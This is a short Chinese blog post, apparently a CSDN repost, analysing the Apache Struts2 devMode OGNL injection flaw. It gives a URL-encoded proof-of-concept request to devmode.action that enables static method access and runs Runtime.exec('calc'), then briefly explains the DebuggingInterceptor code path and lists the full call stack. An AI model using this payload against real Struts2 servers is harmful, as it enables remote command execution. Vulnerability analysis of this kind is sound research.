0x00 前言
由于CSDN原力获取机制,所以基本上一天转过来一篇。
0x01 正文
1.环境
环境推荐vulhub,或者git上拉一个就行。
poc:
devmode.action
?debug=command
&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%[email protected]@getRuntime%28%29.exec%28%22calc%22%29)
2.漏洞分析
主要原理就是当s2开启devMode的时候,DebuggingInterceptor 回去检测debug参数是否为console,command,browser,在command,browser的时候会触发stack.findValue。
这里按顺序分析即可,最后可以看到ognlUtil.getValue
接着就会进入ognl的操作
最终的执行的位置:
最后贴上调用链:
getValueBody:53, ASTAssign (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:63, ASTSequence (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValue:494, Ognl (ognl)
getValue:458, Ognl (ognl)
getValue:213, OgnlUtil (com.opensymphony.xwork2.ognl)
getValueUsingOgnl:277, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValue:260, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValueWhenExpressionIsNotNull:242, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:222, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:284, OgnlValueStack (com.opensymphony.xwork2.ognl)
intercept:219, DebuggingInterceptor (org.apache.struts2.interceptor.debugging)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:145, ChainingInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:171, PrepareInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:176, I18nInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:164, ServletConfigInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:190, AliasInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:187, ExceptionMappingInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
execute:52, StrutsActionProxy (org.apache.struts2.impl)
serviceAction:498, Dispatcher (org.apache.struts2.dispatcher)
doFilter:434, FilterDispatcher (org.apache.struts2.dispatcher)
internalDoFilter:235, ApplicationFilterChain (org.apache.catalina.core)
doFilter:206, ApplicationFilterChain (org.apache.catalina.core)
invoke:233, StandardWrapperValve (org.apache.catalina.core)
invoke:191, StandardContextValve (org.apache.catalina.core)
invoke:127, StandardHostValve (org.apache.catalina.core)
invoke:103, ErrorReportValve (org.apache.catalina.valves)
invoke:109, StandardEngineValve (org.apache.catalina.core)
service:293, CoyoteAdapter (org.apache.catalina.connector)
process:859, Http11Processor (org.apache.coyote.http11)
process:610, Http11Protocol$Http11ConnectionHandler (org.apache.coyote.http11)
run:503, JIoEndpoint$Worker (org.apache.tomcat.util.net)
run:748, Thread (java.lang)
以上